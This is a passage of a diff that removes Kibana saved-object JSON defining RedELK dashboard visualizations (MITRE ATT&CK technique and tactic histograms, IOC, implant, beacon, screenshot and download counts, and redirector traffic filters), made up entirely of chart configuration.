"migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "87530b40-9269-11eb-a753-9da683898c26", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 111 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - MITRE ATT&CK Techniques", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-6h", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "3", - "params": { - "field": "signal.rule.threat.technique.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 100 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Count" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Count" - }, - "type": "value" - } - ] - }, - "title": "RedELK - MITRE ATT&CK Techniques", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "231792d0-d050-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 113 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - MITRE ATT&CK Tactics", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-6h", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "3", - "params": { - "field": "signal.rule.threat.tactic.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 100 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Count" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Count" - }, - "type": "value" - } - ] - }, - "title": "RedELK - MITRE ATT&CK Tactics", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 115 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - IP Lists donut", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "3", - "params": { - "field": "iplist.source", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 5 - }, - "schema": "segment", - "type": "terms" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "iplist.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 30 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": true, - "truncate": 100, - "values": true - }, - "legendPosition": "bottom", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - IP Lists donut", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "2f77a150-926a-11eb-a753-9da683898c26", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "87530b40-9269-11eb-a753-9da683898c26", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 117 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Modules results donut", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "4", - "params": { - "customLabel": "Module type", - "field": "module.type", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 5 - }, - "schema": "split", - "type": "terms" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "Module type", - "field": "module.last_run.status", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 10 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": true, - "truncate": 100, - "values": true - }, - "legendPosition": "bottom", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "row": true, - "type": "pie" - }, - "title": "RedELK - Modules results donut", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "2f971ac0-926b-11eb-a753-9da683898c26", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "654f76a0-9269-11eb-a753-9da683898c26", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 119 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - IOC Types tag cloud", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "IOC Types", - "field": "ioc.type", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 10 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "maxFontSize": 72, - "minFontSize": 18, - "orientation": "single", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "scale": "linear", - "showLabel": true - }, - "title": "RedELK - IOC Types tag cloud", - "type": "tagcloud" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 121 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Screenshots total count", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Screenshots" - }, - "schema": "metric", - "type": "count" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - Screenshots total count", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "389dddc0-d317-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 123 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Alarmed IOC over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Alarmed IOC" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-30h", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Alarmed IOC" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Alarmed IOC" - }, - "type": "value" - } - ] - }, - "title": "RedELK - Alarmed IOC over time", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 125 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Downloads per user tag cloud", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Downloads", - "field": "user.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 20 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "maxFontSize": 72, - "minFontSize": 18, - "orientation": "single", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "scale": "linear", - "showLabel": false - }, - "title": "RedELK - Downloads per user tag cloud", - "type": "tagcloud" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 127 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "title": "RedELK - Dashboard links external", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [], - "params": { - "fontSize": 12, - "markdown": "**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) ", - "openLinksInNewTab": true - }, - "title": "RedELK - Dashboard links external", - "type": "markdown" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "45491770-0886-11eb-a2d2-171dc8941414", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [], - "sort": [ - 1642171875895, - 128 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - TTP Techniques unique count total ", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "MITRE ATT&CK Techniques", - "field": "threat.technique.id" - }, - "schema": "metric", - "type": "cardinality" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - TTP Techniques unique count total ", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "464660c0-d360-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "cc523820-d021-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 130 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "title": "RedELK - HTTP Redir filters", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [], - "params": { - "controls": [ - { - "fieldName": "redir.backend.name", - "id": "1627506187584", - "indexPatternRefName": "control_0_index_pattern", - "label": "Backend", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - }, - { - "fieldName": "source.as.organization.name", - "id": "1627507362404", - "indexPatternRefName": "control_1_index_pattern", - "label": "ASN", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - }, - { - "fieldName": "source.geo.country_iso_code", - "id": "1627507398459", - "indexPatternRefName": "control_2_index_pattern", - "label": "Country", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - }, - { - "fieldName": "tags", - "id": "1627507415074", - "indexPatternRefName": "control_3_index_pattern", - "label": "Tags", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - } - ], - "pinFilters": false, - "updateFiltersOnChange": true, - "useTimeFilter": true - }, - "title": "RedELK - HTTP Redir filters", - "type": "input_control_vis" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "56350050-efe7-11eb-8a9f-2572da287875", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "redirtraffic", - "name": "control_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "redirtraffic", - "name": "control_1_index_pattern", - "type": "index-pattern" - }, - { - "id": "redirtraffic", - "name": "control_2_index_pattern", - "type": "index-pattern" - }, - { - "id": "redirtraffic", - "name": "control_3_index_pattern", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 135 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Implants total count ", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Implants" - }, - "schema": "metric", - "type": "count" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - Implants total count ", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "57626ad0-d355-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 137 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - IOC total count", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "IOC" - }, - "schema": "metric", - "type": "count" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - IOC total count", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 139 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Redirector traffic alarmed IP total count", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Alarmed IP", - "field": "source.ip" - }, - "schema": "metric", - "type": "cardinality" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - Redirector traffic alarmed IP total count", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 141 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Beacons per host", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "host.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 999 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": false, - "truncate": 100, - "values": true - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - Beacons per host", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "632081a0-d02a-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 143 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Screenshots per user tag cloud", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "user.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 100 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "maxFontSize": 72, - "minFontSize": 18, - "orientation": "single", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "scale": "linear", - "showLabel": false - }, - "title": "RedELK - Screenshots per user tag cloud", - "type": "tagcloud" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "659280b0-d317-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 145 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Beacons per user", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "user.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 999 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": false, - "truncate": 100, - "values": true - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - Beacons per user", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 147 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Alarmed IOC total count", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Alarmed IOC" - }, - "schema": "metric", - "type": "count" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - Alarmed IOC total count", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 149 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Downloads over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Downloads" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-4w", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Downloads" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "defaultYExtents": false, - "mode": "normal", - "setYExtents": false, - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Downloads" - }, - "type": "value" - } - ] - }, - "title": "RedELK - CS - 